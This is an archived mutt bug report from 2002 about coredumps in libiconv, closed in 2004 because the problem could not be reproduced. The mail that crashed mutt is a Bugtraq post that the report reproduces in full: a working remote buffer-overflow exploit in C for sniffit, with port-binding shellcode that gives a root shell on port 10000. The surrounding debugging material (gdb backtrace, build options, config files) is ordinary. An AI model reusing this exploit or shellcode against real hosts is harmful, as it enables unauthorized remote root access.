bug#1001: marked as done (mutt-1.3.25i: Further info on previously reported mutt/libiconv coredumps)
Your message dated Sat, 12 Jun 2004 01:55:03 +0100
with message-id <20040612005503.GO12059@xxxxxxxxxxxxxxxxxxxxx>
and subject line Close.
has caused the attached bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Herr der Kaefer
(administrator, GUUG bugs database)
--------------------------------------
Received: (at submit) by bugs.guug.de; 23 Jan 2002 19:15:48 +0000
>From cliftonr@xxxxxxxx Wed Jan 23 20:15:48 2002
Received: from malasada.lava.net ([64.65.64.17]
ident={sAJnn05dukb98Wk9Duep93jKRximnCRp})
by trithemius.gnupg.org with esmtp (Exim 3.12 #1 (Debian))
id 16TSs7-0001H9-00
for <submit@xxxxxxxxxxxx>; Wed, 23 Jan 2002 20:15:47 +0100
Received: from localhost (14138 bytes) by malasada.lava.net; Wed, 23 Jan 2002
09:14:15 -1000 (HST)
via sendmail [stdio] id <m16TSqd-00147TC@xxxxxxxxxxxxxxxxx>
for <submit@xxxxxxxxxxxx>
Message-Id: <m16TSqd-00147TC@xxxxxxxxxxxxxxxxx>
Date: Wed, 23 Jan 2002 09:14:15 -1000 (HST)
From: cliftonr@xxxxxxxx (Clifton Royston)
Subject: mutt-1.3.25i: Further info on previously reported mutt/libiconv
coredumps
To: submit@xxxxxxxxxxxx
Bcc:
Package: mutt
Version: 1.3.25i
Severity: grave
-- Please type your report below this line
Similar to previous report - on viewing a mail, mutt dumps core with
segmentation fault; once again, the stack indicates the crash is in
libiconv (v. 1.7.) Seems to be something to do with handling of
embedded binary characters, possibly when no character set is
specified? Sample mail is included immediately below. (In a bit of
irony, it's a Bugtraq email about shellcode exploits for another piece
of software; while this bug is looking to me more and more like it
could be remotely exploitable.)
In the meantime I'm trying to get mutt 1.2.5.1 to build on this
system, so I can see if it's any more reliable.
-- Mail which kills it:
>From securityfocus.com!bugtraq-return-3331-cliftonr=lava.net Mon Jan 21
>18:55:15 2002
Return-Path: <bugtraq-return-3331-cliftonr=lava.net@xxxxxxxxxxxxxxxxx>
Received: from outgoing.securityfocus.com
(outgoing2.securityfocus.com[66.38.151.26]) (8313 bytes) by malasada.lava.net;
Mon, 21 Jan 2002 18:55:13 -1000 (HST)
via sendmail [esmtp] id <m16Ssxl-000wm7b@xxxxxxxxxxxxxxxxx>
for <cliftonr@xxxxxxxx>
Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
by outgoing.securityfocus.com (Postfix) with QMQP
id C2CD88F2E8; Mon, 21 Jan 2002 21:20:38 -0700 (MST)
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
Received: (qmail 8666 invoked from network); 19 Jan 2002 18:48:42 -0000
Date: 19 Jan 2002 18:57:03 -0000
Message-ID: <20020119185703.25304.qmail@xxxxxxxxxxxxxxxxxxxxxx>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: <g_463@xxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: remote buffer overflow in sniffit
X-Input: 66.38.151.26
Content-Length: 7058
Lines: 287
/*
Remote overflow in sniffit.0.3.7.beta
tested on slackware 7.1
found/coded by g463
-18th january 2002-
The vulnerability is triggered when the option -L is
called from the
command line with 'normmail'
ie : ./sniffit -c ./sample_config_file -L normmail
It calls a piece of code where the buffer is
unchecked
//From sniffit.0.3.7.beta/sn_logfile.c
void print_mail (char *conn, char *msg)
{
char line[250];
sprintf(line,"%s: mail [%s]",conn,msg);
print_logline (line);
}
- In a normal situation, it could be easier to fill line
[250] with our
shellcode, but since this buffer gets filter with
some kind of
strlower() function (thus our shellcode/return
adress too), i rely
on an unfiltered buffer with the same data so we
can point eip back
at that place with clean, unmodified shellcode :D
All my brothers (alphabetical order) : Erebus, Jinx,
mtadbf, nitr0gen, Slink[e]
+ some others i forget :p
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <error.h>
#include <string.h>
#define SMTP_PORT 25
#define MAX_LINE 256
#define BUFLEN 252
//define this to your ip
#define MY_IP "192.168.0.1"
//Value for overwriting eip
//should be the adress of the data buffer + some
couple of garbage bytes
#define RETADR 0x08059408
//Port binding shellcode, binds on port 10000
//taken from bighawk@xxxxxxxxxxx
char shellcode[] =
"\x31\xc0" // xor eax,
eax
"\x31\xdb" // xor ebx,
ebx
"\x89\xe5" // mov ebp,
esp
"\x99" // cdq
"\xb0\x66" // mov al,
102
"\x89\x5d\xfc" // mov [ebp-4], ebx
"\x43" // inc ebx
"\x89\x5d\xf8" // mov [ebp-8], ebx
"\x43" // inc ebx
"\x89\x5d\xf4" // mov [ebp-12], ebx
"\x4b" // dec ebx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\x45\xf4" // mov [ebp-12], eax
"\x43" // inc ebx
"\x66\x89\x5d\xec" // mov [ebp-
20], bx
"\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word
4135
"\x89\x55\xf0" // mov [ebp-16], edx
"\x8d\x45\xec" // lea eax, [ebp-20]
"\x89\x45\xf8" // mov [ebp-8], eax
"\xc6\x45\xfc\x10" // mov [ebp-4], byte
16
"\xb2\x66" // mov dl,
102
"\x89\xd0" // mov eax,
ed
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\xd0" // mov eax,
edx
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x43" // inc ebx
"\x89\xd0" // mov eax,
edx
"\x99" // cdq
"\x89\x55\xf8" // mov [ebp-8], edx
"\x89\x55\xfc" // mov [ebp-4], edx
"\xcd\x80" // int 80h
"\x31\xc9" // xor ecx,
ecx
"\x89\xc3" // mov ebx,
eax
"\xb1\x03" // mov cl, 3
"\xb0\x3f" // mov al,
63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop -7
"\x52" // push edx
"\x68\x6e\x2f\x73\x68" // push dword
68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword
69622f2fh
"\x89\xe3" // mov ebx,
esp
"\x52" // push edx
"\x53" // push ebx
"\x89\xe1" // mov ecx,
esp
"\xb0\x0b" // mov al,
11
"\xcd\x80"; // int 80h
int usage (char *);
int calculate_conn_lenght (struct sockaddr_in, struct
sockaddr_in);
int
main (int argc, char *argv[])
{
struct sockaddr_in stServer, stClient;
char *ptHost;
unsigned long int iHost;
int iSockfd, iLenght, iAlign = 0;
char sBuffer[MAX_LINE];
char sString[300];
int i;
if (argc != 2) usage (argv[0]);
ptHost = argv[1];
if ( (iHost = inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Invalid host or host is 255.255.255.255\n");
exit (-1);
}
//Fill the server struct
memset (&stServer, 0, sizeof (struct sockaddr_in));
stServer.sin_family = AF_INET;
stServer.sin_port = htons (SMTP_PORT);
stServer.sin_addr.s_addr = iHost;
if ( (iSockfd = socket (AF_INET, SOCK_STREAM,
0)) == -1) {
printf ("Error opening socket\n");
exit (-1);
}
// Fill the client struct, mainly used to calculate the
right align for RET addy
memset (&stClient, 0, sizeof (struct sockaddr_in));
stClient.sin_family = AF_INET;
stClient.sin_port = htons (0);
stClient.sin_addr.s_addr = inet_addr (MY_IP);
if ( (bind (iSockfd, (struct sockaddr *) &stClient,
sizeof (stClient))) == -1 ) {
perror ("Cant bind socket");
exit (-1);
}
iAlign = calculate_conn_lenght (stClient, stServer);
i = BUFLEN - iAlign + 4;
if ( (connect (iSockfd, (struct sockaddr *)
&stServer, sizeof (stServer))) != 0) {
perror ("Cant connect");
exit (-1);
}
else printf ("Connected to host %s on port %d\n\n",
ptHost, SMTP_PORT);
// Recevons la banni?re du serveur smtp
if ( (iLenght = recv (iSockfd, sBuffer, MAX_LINE, 0))
== -1) {
perror ("Cant get server banner");
exit (-1);
}
printf ("%s\n", sBuffer);
printf ("Building evil string... >:)\n");
memset (sString, 0x90, sizeof (sString));
memcpy (sString, "mail from:", strlen ("mail from:"));
memcpy(sString + i - strlen (shellcode), shellcode,
strlen (shellcode));
sString[i++] = (RETADR & 0x000000ff);
sString[i++] = (RETADR & 0x0000ff00) >> 8;
sString[i++] = (RETADR & 0x00ff0000) >> 16;
sString[i++] = (RETADR & 0xff000000) >> 24;
sString[i] = '\0';
if ( (send (iSockfd, sString, strlen (sString), 0)) == -
1) {
perror ("cant send message");
exit (-1);
}
printf ("Evil string sent!\n");
printf ("Try telneting the host on port 10000 for r00t
shell!\n");
close (iSockfd);
return (0);
}
int usage (char *progname)
{
printf ("%s <ip>\n", progname);
exit (-1);
}
/*
function to calculate conn entry lenght
ie : strlen of ("192.168.0.1.1024-192.168.0.69.25");
(fuckin dirty but heh it works)
*/
int calculate_conn_lenght (struct sockaddr_in me,
struct sockaddr_in him)
{
int lenght = 0;
struct in_addr in;
in.s_addr = me.sin_addr.s_addr;
lenght += strlen (inet_ntoa (in)); // 192.168.0.1
lenght++; // .
lenght += 4; // 1220
lenght ++; // .
in.s_addr = him.sin_addr.s_addr;
lenght += strlen (inet_ntoa (in)); // 192.168.0.69
lenght++; // .
lenght += 2; // 25
lenght += strlen (": mail [");
return (lenght);
}
-- Build environment information
(Note: This is the build environment installed on the system
muttbug is run on. Information may or may not match the environment
used to build mutt.)
- gcc version information
gcc
Using builtin specs.
gcc version egcs-2.91.66 19990314 (egcs-1.1.2 release)
- CFLAGS
-Wall -pedantic -g -O2
-- Mutt Version Information
Mutt 1.3.25i (2002-01-01)
Copyright (C) 1996-2001 Michael R. Elkins and others.
Mutt comes with ABSOLUTELY NO WARRANTY; for details type `mutt -vv'.
Mutt is free software, and you are welcome to redistribute it
under certain conditions; type `mutt -vv' for details.
System: BSD/OS 4.1 (i386) [using ncurses 5.0]
Compile options:
-DOMAIN
+DEBUG
-HOMESPOOL -USE_SETGID +USE_DOTLOCK -DL_STANDALONE
+USE_FCNTL -USE_FLOCK
-USE_POP +USE_IMAP -USE_GSS +USE_SSL -USE_SASL
+HAVE_REGCOMP -USE_GNU_REGEX
+HAVE_COLOR +HAVE_START_COLOR +HAVE_TYPEAHEAD +HAVE_BKGDSET
+HAVE_CURS_SET +HAVE_META +HAVE_RESIZETERM
+HAVE_PGP -BUFFY_SIZE -EXACT_ADDRESS -SUN_ATTACHMENT
+ENABLE_NLS -LOCALES_HACK -HAVE_WC_FUNCS -HAVE_LANGINFO_CODESET
-HAVE_LANGINFO_YESEXPR
+HAVE_ICONV -ICONV_NONTRANS -HAVE_GETSID +HAVE_GETADDRINFO
ISPELL="/usr/contrib/bin/ispell"
SENDMAIL="/usr/sbin/sendmail"
MAILPATH="/var/mail"
PKGDATADIR="/usr/local/share/mutt"
SYSCONFDIR="/usr/local/etc"
EXECSHELL="/bin/sh"
-MIXMASTER
To contact the developers, please mail to <mutt-dev@xxxxxxxx>.
To report a bug, please use the flea(1) utility.
-- Core Dump Analysis Output
GNU gdb
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-bsdi4.1"...
Core was generated by `mutt'.
Program terminated with signal 11, Segmentation fault.
#0 0x481f8477 in libiconv ()
#0 0x481f8477 in libiconv ()
#1 0x808de9c in mutt_iconv (cd=0x74616c75, inbuf=0x80459a8,
inbytesleft=0x80459ac, outbuf=0x80459b0, outbytesleft=0x80459b4,
inrepls=0x0, outrepl=0x80a95d0 "?") at charset.c:353
#2 0x80636d6 in convert_to_state (cd=0x74616c75,
bufi=0x80461b8 "\212re du serveur smtp\n if ( (iLenght = recv (iSockfd,
sBuffer, MAX_LINE, 0)) \n== -1) {\n \n perror (\"Cant get server
banner\");\n exit (-1); \n\n }\n printf (\"%s\\n\", sBuffer); \n\n
printf "..., l=0x80461b4, s=0x80468b8) at handler.c:109
#3 0x80637f6 in mutt_decode_xbit (s=0x6e6f6974, len=544175136,
istext=1668047203, cd=0x74616c75) at handler.c:146
#4 0x636e7566 in ?? ()
Cannot access memory at address 0x2020200a.
(gdb)
--- Begin /home/staff/cliftonr/.muttrc
set alias_file=~/.aliases
source ~/.aliases
subscribe cricket-users
subscribe social-l jokes-l crude-l
subscribe onc-members
subscribe crypto-gram
subscribe geek
subscribe hix-l
subscribe webmasters-l
subscribe blackbook-l
subscribe members@xxxxxxxxxxxx
subscribe susie@xxxxxxxxxxxxxxx
subscribe cricket
subscribe qpopper
subscribe rrd
subscribe wordsmith
subscribe freebsd
subscribe openbsd
set alternates="cliftonr@.*"
set hostname="lava.net"
set record="=sent"
set mbox="=received"
set save_name askcc beep_new hidden_host
set delete=ask-yes
set move=ask-no
set pager_context=1
set sort=threads
set sort_aux=date
set to_chars=" TtcF"
set forward_format="(Fwd) %s"
set forward_quote
unset wrap_search save_empty
mono tree bold
mono status reverse
mono search bold
mono index underline ~N
mono index none ~l
mono index bold ~Csystem@lava
mono error standout
color tree yellow default
color status white blue
color search yellow default
color index green default ~N
color index blue default ~l
mono index bold ~Csystem@lava
color index red default ~Csystem@lava
color error white red
macro pager y iy
bind generic X exit
bind generic \^ first-entry
bind generic $ last-entry
bind generic < previous-page
bind generic > next-page
bind pager \^ top
bind pager $ bottom
bind index x exit
bind index $ last-entry
bind index \Cl sync-mailbox
bind index = sync-mailbox
macro index Q q^M^M
macro index \cb |urlview\n
macro pager \cb |urlview\n
auto_view text/html
--- End /home/staff/cliftonr/.muttrc
--- Begin /usr/local/etc/Muttrc
ignore "from " received content- mime-version status x-status message-id
ignore sender references return-path lines
macro index \eb '/~b ' 'search in message bodies'
macro index \cb |urlview\n 'call urlview to extract URLs out of a message'
macro pager \cb |urlview\n 'call urlview to extract URLs out of a message'
macro generic <f1> "!less /usr/local/doc/mutt/manual.txt\n" "Show Mutt
documentation"
macro index <f1> "!less /usr/local/doc/mutt/manual.txt\n" "Show Mutt
documentation"
macro pager <f1> "!less /usr/local/doc/mutt/manual.txt\n" "Show Mutt
documentation"
--- End /usr/local/etc/Muttrc
---------------------------------------
Received: (at 1161-done) by bugs.guug.de; 12 Jun 2004 00:53:11 +0000
>From paul@xxxxxxxxxxxxxxxxxxxxx Sat Jun 12 02:53:09 2004
Received: from anchor-post-31.mail.demon.net ([194.217.242.89])
by trithemius.gnupg.org with esmtp (Exim 3.35 #1 (Debian))
id 1BYwlh-0005xU-00
for <1161-done@xxxxxxxxxxxx>; Sat, 12 Jun 2004 02:53:09 +0200
Received: from black-sun.demon.co.uk ([212.228.147.62] helo=nova)
by anchor-post-31.mail.demon.net with esmtp (Exim 3.35 #1)
id 1BYwof-0001Bc-0V
for 1161-done@xxxxxxxxxxxx; Sat, 12 Jun 2004 01:56:17 +0100
Received: from paul
by nova with local id 1BYwnh-00053J-HG
for <1161-done@xxxxxxxxxxxx>; Sat, 12 Jun 2004 01:55:13 +0100
Date: Sat, 12 Jun 2004 01:55:03 +0100
From: Paul Walker <paul@xxxxxxxxxxxxxxxxxxxxx>
To: 1161-done@xxxxxxxxxxxx
Subject: Close.
Message-ID: <20040612005503.GO12059@xxxxxxxxxxxxxxxxxxxxx>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="s9fJI615cBHmzTOP"
Content-Disposition: inline
User-Agent: Mutt/1.5.5.1+cvs20040105i
X-Spam-Status: No, hits=-107.0 required=4.0
tests=AWL,BAYES_20,PGP_SIGNATURE_2,USER_AGENT_MUTT,
USER_IN_WHITELIST
autolearn=ham version=2.55
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)
--s9fJI615cBHmzTOP
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Cannot reproduce; original submitter no longer seems to be contactable at
any of joop@xxxxxxxxxxxx, joop@xxxxxx, or joop@xxxxxxxxxxxxxx=20
Robert - if I missed one and you're still seeing the problem, I apologise,
and we can re-open the bug. :-)
--=20
Paul
--s9fJI615cBHmzTOP
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFAylRnP9fOqdxRstoRAqByAKCfOhhgO/GDS9wBFbexRRCU4fKQigCffPYM
VNPvFcTpTh/W+96BKfRKjSI=
=tjJM
-----END PGP SIGNATURE-----
--s9fJI615cBHmzTOP--